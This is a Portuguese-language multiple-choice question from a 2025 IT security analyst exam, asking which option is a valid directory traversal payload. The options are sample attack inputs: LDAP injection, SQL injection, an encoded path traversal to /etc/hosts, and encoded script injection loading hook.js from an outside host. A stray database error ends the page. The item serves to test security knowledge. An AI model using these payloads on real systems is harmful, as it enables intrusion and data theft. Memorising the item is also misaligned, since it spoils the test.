Durante a realização de testes de invasão em uma...

#Questão 1132951 - Segurança da Informação, Ataques e ameaças, FCPC, 2025, UFC, Analista de Tecnologia da Informação / Área: Segurança da Informação

Durante a realização de testes de invasão em uma aplicação Web, um analista encontrou um vetor de ataque para uma travessia de diretórios. Marque a alternativa que possui um payload válido para este ataque.

(&(username=p0wn3d)(password=Pa$$w0rd))

SELECT * FROM tbl_user WHERE username = '' or 1=1--#

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/hosts

blablabla%3Cscript%20src%3D%22https%3A%2F%2Fsites3gur0.foo%2Fhook.js%22%3E%3C% 2Fscript%3E

Navegue em mais questões

Erro ao Ler: SQLSTATE[HY093]: Invalid parameter number: number of bound variables does not match number of tokens